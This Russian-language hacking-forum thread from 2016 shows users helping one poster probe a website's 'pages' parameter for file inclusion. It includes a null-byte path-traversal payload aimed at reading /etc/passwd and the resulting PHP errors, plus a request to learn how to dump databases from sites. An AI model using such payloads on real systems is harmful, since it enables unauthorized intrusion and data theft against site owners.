HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1511  
Старый 01.12.2016, 17:37
nik1201
Guest
Сообщений: n/a
Провел на форуме:
13708

Репутация: 0
По умолчанию

Цитата:
Сообщение от BabaDook  
BabaDook said:

что за код ?
В смысле мой внедряемый код,допустим сайт.

Я допустим пишу "www.ВасяПупкин.ru" в параметр pages

Получается так www.Сайт.com/index.php?Id=pages&pages=www.ВасяПупкин.ru

Выводится ошибкаinclude_once(pages/www.ВасяПупкин.ru) failed to open stream: No such file or directory
 
Ответить с цитированием

  #1512  
Старый 01.12.2016, 17:48
nik1201
Guest
Сообщений: n/a
Провел на форуме:
13708

Репутация: 0
По умолчанию

Цитата:
Сообщение от BabaDook  
BabaDook said:

у вас не отработает, вам надо откидывать хтмл. не факт что у вас рфи
Вот что выдает с откинутой .html

include_once(): Failed opening 'pages/http://www.ВасяПупкин.ru' for inclusion (include_path='.:/usr/share/php:/usr/share/pear')
 
Ответить с цитированием

  #1513  
Старый 01.12.2016, 18:04
shell_c0de
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
Провел на форуме:
1585404

Репутация: 564
Отправить сообщение для shell_c0de с помощью ICQ Отправить сообщение для shell_c0de с помощью AIM
По умолчанию

попробуй для начало просто так отсеч с нулбайтом www.Сайт.com/index.php?Id=pages&pages=../../../etc/passwd%00
__________________
Никогда не бойся делать то, что ты не умеешь. Помни, ковчег был построен любителем. "Титаник" - проффесионалами.
 
Ответить с цитированием

  #1514  
Старый 01.12.2016, 18:24
nik1201
Guest
Сообщений: n/a
Провел на форуме:
13708

Репутация: 0
По умолчанию

Цитата:
Сообщение от shell_c0de  
shell_c0de said:

попробуй для начало просто так отсеч с нулбайтом
www.Сайт.com/index.php?Id=pages&pages=
../../../etc/passwd%00
Выдает это

[phpBB Debug] PHP Warning: in file /var/ВасяПупкин.com/index.php on line 544:include_once(): Failed opening 'pages/../../../etc/passwd' for inclusion (include_path='.:/usr/share/php:/usr/share/pear')
 
Ответить с цитированием

  #1515  
Старый 01.12.2016, 18:36
Octavian
Guest
Сообщений: n/a
Провел на форуме:
97114

Репутация: 24
По умолчанию

Цитата:
Сообщение от nik1201  
nik1201 said:

Выдает это
[phpBB Debug] PHP Warning
: in file
/var/ВасяПупкин.com/index.php
on line
544
:
include_once(): Failed opening 'pages/../../../etc/passwd' for inclusion (include_path='.:/usr/share/php:/usr/share/pear')
Да кидаи ты URL 100 смс 100 строк мусора
 
Ответить с цитированием

  #1516  
Старый 01.12.2016, 20:04
nik1201
Guest
Сообщений: n/a
Провел на форуме:
13708

Репутация: 0
По умолчанию

Картинка же удаленная инжектится же

www.Сайт.com/index.php?Id=pages&pages=%00

Через теги коды выполняются,кроме php
 
Ответить с цитированием

  #1517  
Старый 01.12.2016, 20:24
t0ma5
Guest
Сообщений: n/a
Провел на форуме:
300820

Репутация: 90
По умолчанию

Цитата:
Сообщение от nik1201  
nik1201 said:

Картинка же удаленная инжектится же
www.Сайт.com/index.php?Id=pages&pages=
%00
Через теги коды выполняются,кроме php
иди к гадалке, что ты от нас хочешь?
 
Ответить с цитированием

  #1518  
Старый 02.12.2016, 15:15
RedFox223
Guest
Сообщений: n/a
Провел на форуме:
620

Репутация: 0
По умолчанию

Всем привет пользователям. Есть ли тут такие "users" которые научат меня сливать БД с разных сайтов(и всё объяснит)? Очень буду благодарен!
 
Ответить с цитированием

  #1519  
Старый 02.12.2016, 15:22
pw0ned
Guest
Сообщений: n/a
Провел на форуме:
33728

Репутация: 14
По умолчанию

Цитата:
Сообщение от RedFox223  
RedFox223 said:

Всем привет пользователям. Есть ли тут такие "users" которые научат меня сливать БД с разных сайтов(и всё объяснит)? Очень буду благодарен!
/forums/30/
 
Ответить с цитированием

  #1520  
Старый 02.12.2016, 15:53
RedFox223
Guest
Сообщений: n/a
Провел на форуме:
620

Репутация: 0
По умолчанию

Цитата:
Сообщение от pw0ned  
pw0ned said:

/forums/30/
Спасибо
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ